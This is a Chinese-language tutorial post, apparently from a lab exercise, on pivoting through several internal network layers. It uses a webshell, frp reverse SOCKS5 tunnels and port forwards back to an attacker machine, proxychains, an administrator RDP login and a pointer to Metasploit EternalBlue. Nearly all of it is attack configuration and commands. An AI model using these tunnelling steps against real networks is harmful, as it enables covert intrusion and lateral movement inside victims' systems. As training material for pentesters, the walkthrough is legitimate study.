目錄
攻擊機?
查看服務端frps.ini配置文件
開啟服務端frps
蟻劍打目標機
? ? ? ??上傳客戶端frp到目標機
?frpc.ini文件配置成?
客戶端打開代理frpc
vps顯示成功客戶端frpc打開
訪問成功192.168.22.22的第二層內網主機
省去前面漏洞利用的rce過程,直接蟻劍開搞隧道代理
?一層內網主機上傳個frps服務端去連接二層內網主機
一層內網主機客戶端配置轉發30000端口
二層內網主機客戶端配置
?一層內網主機開啟服務端?
二層內網主機開啟客戶端?
kali代理配置打?
??注意:這個地方要開啟的是30000的proxychains去代理連接三層內網主機
成功連接,可以用proxychains利用msf的永恒之藍打?
需要用到frp這款工具,后臺私信我獲取?
攻擊機?
查看服務端frps.ini配置文件
[common]
bind_port = 7000
root@iZt4njbm6gjpckh0e72p0lZ:~/frp#
?
開啟服務端frps
chmod u+x frps
./frps -c frps.ini #開啟frp
蟻劍打目標機
上傳客戶端frp到目標機
前面已將一層內網連接蟻劍的方式講過,這篇frp的省去這個過程
chmod u+x frpc #給個執行權限
?frpc.ini文件配置成?
解讀代碼,它會抓發流量到你的攻擊機192.168.20.128:20000
[common]
server_addr = 192.168.20.128
server_port = 7000[socks_proxy]
type=tcp
plugin=socks5
remote_port=20000
?客戶端打開代理frpc
./frpc -c frpc.ini
vps顯示成功客戶端frpc打開
?配置瀏覽器代理
?訪問成功192.168.22.22的第二層內網主機
省去前面漏洞利用的rce過程,直接蟻劍開搞隧道代理
?一層內網主機上傳個frps服務端去連接二層內網主機
? 一層內網主機客戶端配置轉發30000端口
[common]
server_addr = 192.168.20.128
server_port = 7000[socks_proxy]
type=tcp
plugin=socks5
remote_port=20000[portfwd]
type=tcp
local_ip=127.0.0.1
local_port=30000
remote_port=30000
?二層內網主機客戶端配置
代碼解讀,二層內網主機連接一層的192.168.22.11:7000端口
[common]
server_addr = 192.168.22.11
server_port = 7000[2_socks_proxy]
type=tcp
plugin=socks5
remote_port=30000
?一層內網主機開啟服務端
二層內網主機開啟客戶端?
kali代理配置打?
?注意:這個地方要開啟的是30000的proxychains去代理連接三層內網主機
proxychains rdesktop -u administrator -p root 192.168.33.33
成功連接,可以用proxychains利用msf的永恒之藍打?
? ? ? ? ?嗎嘍crazy,歡迎來交流?
?